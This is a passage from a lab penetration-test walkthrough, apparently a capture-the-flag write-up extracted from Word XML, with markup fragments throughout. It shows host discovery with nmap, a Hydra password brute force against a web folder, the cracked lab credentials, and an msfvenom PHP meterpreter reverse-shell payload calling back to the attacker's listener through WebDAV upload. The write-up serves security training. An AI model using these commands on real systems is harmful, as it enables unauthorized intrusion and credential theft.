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Red Team Pentest Walkthrough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t xml:space="preserve">Our target today is a Virtual Machine through the Trilogy Labs website. The first thing we do after the lab is set up is pull up a terminal and run the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netdiscover: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53063" cy="1376853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376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We see some important information right off the bat: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address: 172.16.84.205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 address: 00:15:5d:01:80:00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Next, we need to run a portscan to get more information on our target. I used nmap with the following command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A 172.16.84.205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4478079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7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More info revealed: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ports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22 ssh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80 http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OS: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Confirmed host IP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Since we have an open HTTP port, the first thing I like to do is check out the webpage to see if there are any obvious vulnerabilities on the website.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5188" cy="2804851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804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Navigating around the sitemap, we come across </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.84.205/company_folders/company_culture/file1.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following message: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263" cy="1945402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945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So, I navigated to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.84.205/company_folders/secret_folder/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and was greeted by the following popup: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162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  <w:t xml:space="preserve">Ok, so now we have a name! I wanted to see if I can brute force the login with “ashton” as the username. I used the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to accomplish this. The command I used was: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 172.16.84.205 http-get /company_folders/secret_folder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35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With that, we get our first password! ashton:leopoldo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863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With this information in hand, I went back to the website and entered the credentials to gain access to the secret_folder. I was then shown this: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2538" cy="154735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547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 clicked through to connecting_to_webdav and found a note that looked to be very useful.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70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So I followed the directions in the above note, and cracked the hash for ryan’s account password. I ended up with the password “linux4u”, and added the webdav to my files!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52713" cy="356673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566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  <w:t xml:space="preserve">The instructions state that I can now share and upload files, so I want to upload a reverse shell to the server. For this, I used the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with the following command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.84.55 lport=4444 &gt;&gt; shell.php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This command creates a PHP reverse shell with our IP as the host using port 4444.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90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With the payload created, I then opened up Metasploit and navigated to the /exploit/multil/handler option. I then set my options, with my payload being set as the meterpreter reverse tcp, and the LHOST as my IP.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4388" cy="3072683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07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Now that the listener is up and running, I put the shell.php file into the webdav directory in my files. Then I navigated back to the webdav webpage at 172.16.84.205 and logged in using Ryan’s credentials, and we see the shell.php file successfully uploaded.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81463" cy="2142429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14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Clicking on the shell.php, our meterpreter session activates and we have a reverse shell. From here, I navigated around the server and found the flag.txt in the root directory.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00525" cy="175698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5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 used the command cat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we are all set!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0375" cy="7524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This was a great, challenging exercise using new techniques and tools! </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="16834" w:w="11909"/>
      <w:pgMar w:bottom="1440" w:top="1440" w:left="1440" w:right="1440" w:header="720.0000000000001" w:footer="623.622047244094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1.png"/><Relationship Id="rId18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